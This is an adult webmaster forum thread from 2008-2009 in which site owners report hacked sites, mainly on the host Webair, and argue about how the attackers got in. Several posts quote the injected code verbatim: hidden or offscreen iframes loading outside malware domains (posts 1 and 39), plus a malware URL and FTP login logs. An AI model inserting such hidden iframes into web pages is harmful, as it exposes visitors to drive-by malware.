Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 07-15-2008, 08:36 PM   #1
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Anyone else had their Webair sites hacked yesterday?

Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibilitydden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibilitydden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers.
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 10:38 PM   #2
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Just a head's up, check your sites. I've informed their registrar.

Had to submit 6 review requests to google as the sites have been royally fucked over.
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 10:42 PM   #3
st0ned
Confirmed User
 
st0ned's Avatar
 
Industry Role:
Join Date: Mar 2007
Location: Arizona
Posts: 8,437
Wow, thanks for the heads up. I recieved an email from them saying that they had to move my server due to a "PDU error", didn't think to check my sites though. Going to scan through them now.
__________________
Conversion Sharks - 1,000+ adult dating offers, traffic management, and consistently high payouts.
We will guarantee and beat your current EPC to win your dating traffic!
Skype: ConversionSharks || Email: info /@/ conversionsharks.com
st0ned is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 10:44 PM   #4
Evil E
Confirmed User
 
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
Might also have to do with you and not the host.

Did you check your logs or talked to your host?
__________________


A girl once told me "Give me 8 inches and make it HURT".

So, I fucked her twice and hit her with a brick.
Evil E is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 10:47 PM   #5
st0ned
Confirmed User
 
st0ned's Avatar
 
Industry Role:
Join Date: Mar 2007
Location: Arizona
Posts: 8,437
No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt
__________________
Conversion Sharks - 1,000+ adult dating offers, traffic management, and consistently high payouts.
We will guarantee and beat your current EPC to win your dating traffic!
Skype: ConversionSharks || Email: info /@/ conversionsharks.com
st0ned is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 10:51 PM   #6
thaifan99
Confirmed User
 
Join Date: Jul 2003
Location: London UK
Posts: 3,029
thanks for the heads up. checking now
thaifan99 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 11:02 PM   #7
fallenmuffin
Confirmed User
 
fallenmuffin's Avatar
 
Industry Role:
Join Date: Nov 2005
Posts: 8,170
Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.
fallenmuffin is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 11:11 PM   #8
Babaganoosh
♥♥♥ Likes Hugs ♥♥♥
 
Babaganoosh's Avatar
 
Industry Role:
Join Date: Nov 2001
Location: /home
Posts: 15,841
Why do people still use webair? They're like the new dreamhost.
__________________
I like pie.
Babaganoosh is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-15-2008, 11:24 PM   #9
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Quote:
Originally Posted by st0ned View Post
No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt
That's a neat tool st0ned, thanks for that.

Yeah, I hear you Babaganoosh. I've just got so many domains, and it's a pain in the ass to source a load of new hosts that accept the kind of sites we make . I already deal with 16 different hosts as it is
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 02:05 AM   #10
jollyperv
Confirmed User
 
Industry Role:
Join Date: Nov 2001
Location: NYC
Posts: 3,927
Quote:
Originally Posted by st0ned View Post
Awesome tool
jollyperv is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:05 AM   #11
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Heard nothing back from webair in 8 hours.

Great support. Not.
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:10 AM   #12
MMarko
Confirmed User
 
Join Date: Jun 2007
Posts: 160
Do you use some cms script or that were plain html pages?
__________________
dlXer - web design, developing, managed hosting, website optimizations
MMarko is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:45 AM   #13
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:48 AM   #14
Dirty F
Too lazy to set a custom title
 
Dirty F's Avatar
 
Industry Role:
Join Date: Jul 2001
Posts: 59,204
I never seen a host getting so much complaints on here as Webair. Yet people always use them. Dont cry about shit if host with Webair. You can expect shit.
Dirty F is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:49 AM   #15
tahiti
Confirmed User
 
Join Date: Oct 2003
Location: localhost
Posts: 699
Quote:
Originally Posted by CunningStunt View Post
Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibilitydden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibilitydden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers.
"Fucking asshole hackers." I'd fucking bad admins! If there were better admin would have less hackers
__________________
-------------------------------
Oliver Smith
"Drunk Russian Hackers are Invincible"
ASCII P0rn rules
aim: olvrsmt
icq: 21018030
tahiti is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:50 AM   #16
potter
Confirmed User
 
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
Quote:
Originally Posted by CunningStunt View Post
It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.
Wow. Goes to show how much you know about web applications and scripting.
__________________

potter is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:51 AM   #17
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
This is the first problem I've had with Webair in 6 years, so you're talking shit as usual Troll boy. I thought you'd been banned permanently once and for all Frank?
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:53 AM   #18
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Quote:
Originally Posted by potter View Post
Wow. Goes to show how much you know about web applications and scripting.
How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 03:59 AM   #19
nico-t
emperor of my world
 
Join Date: Aug 2004
Location: nethalands
Posts: 29,903
webair is one of te few hosts i avoid like the plague, about 1 thread a week about them.
nico-t is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 04:02 AM   #20
potter
Confirmed User
 
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
Quote:
Originally Posted by CunningStunt View Post
How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?
There are dozens of ways to gain access. They can hack a php or similar script running on your website. They can hack the server itself. They can hack the local network the server is located on. etc etc etc. Ten times out of ten it's a poorly written php script which is easily attacked to give the hacker access to the server files.

Seriously dude. Webmaster 101. You should know this shit already. Specially if you have your own dedi box.
__________________

potter is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 04:08 AM   #21
CunningStunt
Confirmed User
 
CunningStunt's Avatar
 
Industry Role:
Join Date: Aug 2006
Posts: 5,594
Thanks for the info potter, but they are basic sites, just html, handwritten, nothing running on them. No scripts to exploit.

I'm not a server guy. I write sites, and expect whoever hosts them to fucking do their job and look after them. I don't expect to have to look after server security as well as know how to SEO a site to beat 40 million others to a #1 keyphrase.
CunningStunt is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 04:24 AM   #22
xentech
Confirmed User
 
xentech's Avatar
 
Join Date: Jan 2006
Location: England
Posts: 1,405
Quote:
Originally Posted by CunningStunt View Post
Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.
xentech is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 04:37 AM   #23
Violetta
Affiliate
 
Violetta's Avatar
 
Join Date: Jul 2004
Posts: 28,735
hmm... somebody complained about a site I posted last night! Gonna double check now!
__________________
M&A Queen
Violetta is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-16-2008, 01:50 PM   #24
Dirty F
Too lazy to set a custom title
 
Dirty F's Avatar
 
Industry Role:
Join Date: Jul 2001
Posts: 59,204
Quote:
Originally Posted by Rockatansky View Post
hmm... somebody complained about a site I posted last night! Gonna double check now!
Yeah that was me. No virus but it just sucked.
Dirty F is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 05:45 PM   #25
pocketkangaroo
Confirmed User
 
Join Date: Jan 2005
Location: Chicago, IL
Posts: 8,452
Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.
pocketkangaroo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 06:09 PM   #26
HorseShit
Too lazy to set a custom title
 
Join Date: Dec 2004
Posts: 17,513
lollllllllllllllll
HorseShit is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 06:09 PM   #27
Cyber Fucker
Hmm
 
Cyber Fucker's Avatar
 
Industry Role:
Join Date: Sep 2005
Location: On an endless road around the world for rock and roll.
Posts: 12,642
Nope, mine box was fine and it is fine now too
__________________
Cyber Fucker is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 06:59 PM   #28
spacedog
Yes that IS me. Bitch.
 
Industry Role:
Join Date: Nov 2001
Posts: 14,149
Quote:
Originally Posted by pocketkangaroo View Post
Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.
You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files
spacedog is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 07:01 PM   #29
Shoplifter
Richest man in Babylon
 
Shoplifter's Avatar
 
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,689
Quote:
Originally Posted by fallenmuffin View Post
Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.
Are you using AT3?
Shoplifter is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 07:20 PM   #30
pocketkangaroo
Confirmed User
 
Join Date: Jan 2005
Location: Chicago, IL
Posts: 8,452
Quote:
Originally Posted by spacedog View Post
You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files
Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.
pocketkangaroo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 08:15 PM   #31
NaughtyRob
Two fresh affiliate progs
 
NaughtyRob's Avatar
 
Industry Role:
Join Date: Nov 2004
Location: Inside teen pussy
Posts: 29,602
I am not with webair but had mine hacked yes. iframe but different code.
NaughtyRob is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 08:28 PM   #32
collegeboobies
So Fucking Banned
 
Join Date: Jul 2004
Posts: 3,644
Quote:
Originally Posted by CunningStunt View Post
How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?
there are a shitload of exploits for most well known scripts people use
collegeboobies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 09:08 PM   #33
notoldschool
Confirmed User
 
notoldschool's Avatar
 
Join Date: Aug 2007
Posts: 5,687
Quote:
Originally Posted by pocketkangaroo View Post
Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.
I had 5 boxes hit with a superlong javascript on hundereds of domains. Any clue what they javascript does other than fuck up your page?
__________________
No doubt one may quote history to support any cause, as the devil quotes scripture.
-- Learned Hand

http://www.bjpenn.com
notoldschool is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 09:46 PM   #34
mynameisjim
Confirmed User
 
mynameisjim's Avatar
 
Join Date: Aug 2007
Posts: 2,985
Quote:
Originally Posted by notoldschool View Post
I had 5 boxes hit with a superlong javascript on hundereds of domains. Any clue what they javascript does other than fuck up your page?
Can either be a simple redirect or a trojan installer.
__________________
jim (at) amateursconvert . com Amateurs Convert
mynameisjim is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2009, 10:40 PM   #35
Major (Tom)
Anti Communist
 
Major (Tom)'s Avatar
 
Industry Role:
Join Date: Nov 2003
Location: Null
Posts: 29,851
Quote:
Originally Posted by st0ned View Post
No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt
Its probally not the host. we had the same thing happen to us on one of our blogs and the guy who updates them had a virus. Only the blogs he updates got slammed

Duke
__________________
My mother said, to get things done
You'd better not mess with Major Tom
Major (Tom) is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2009, 05:32 AM   #36
notoldschool
Confirmed User
 
notoldschool's Avatar
 
Join Date: Aug 2007
Posts: 5,687
this is the first part of the pop you get from the virus that has infected webair servers.
ijabwif.com/cgi-bin

some boxes with norton catch the virus and some dont.
Webair is being VERY quiet about this for some reason.
__________________
No doubt one may quote history to support any cause, as the devil quotes scripture.
-- Learned Hand

http://www.bjpenn.com
notoldschool is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2009, 05:50 AM   #37
VladS
Available for Coding Work
 
VladS's Avatar
 
Industry Role:
Join Date: Jun 2008
Posts: 1,432
All of my sites have been infected with a piece of js code on all the index files. The sites are on four different hosting accounts, the FTP passwords are not the same.

Yeah, basically i'm fubar. I'm expecting Google to take notice and ban the sites, and if that happens, well...

I don't quite understand how they got in on four different hosting accounts. Judging by the FTP logs, it seems it was some sort of script that inserted this code, because all files on all hosting accounts have been changed at the same exact time. 9.05.2009 - 12:24.

The hosts cleaned the sites, but a few days later, i've been hit again. It seems it is something on my PC that is causing this.

Last edited by VladS; 05-14-2009 at 05:51 AM..
VladS is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2009, 05:59 AM   #38
V_RocKs
Damn Right I Kiss Ass!
 
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,397
Your PC? Highly unlikely...
V_RocKs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2009, 06:01 AM   #39
VladS
Available for Coding Work
 
VladS's Avatar
 
Industry Role:
Join Date: Jun 2008
Posts: 1,432
This is the first code that was injected on my sites: (decoded version)

Code:
<iframe width="480" height="60" src="http://download-123.cn/vtiadmin2/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
The FTP logs:

Quote:
CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sat May 9 05:24:25 2009

FTP Logged in from:
Country: United States
Internet segment: 65.64.0.0/13
Internet Service Provider: SBIS-AS - SBC Internet Services
Quote:
CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sun May 10 23:54:24 2009

FTP Logged in from:
Country: Germany
Internet segment: 81.169.144.0/20
Internet Service Provider: STRATO Strato AG
VladS is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2009, 06:14 AM   #40
seeandsee
Check SIG!
 
seeandsee's Avatar
 
Industry Role:
Join Date: Mar 2006
Location: Europe (Skype: gojkoas)
Posts: 50,945
HI


fucked shit
__________________
BUY MY SIG - 50$/Year

Contact here
seeandsee is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.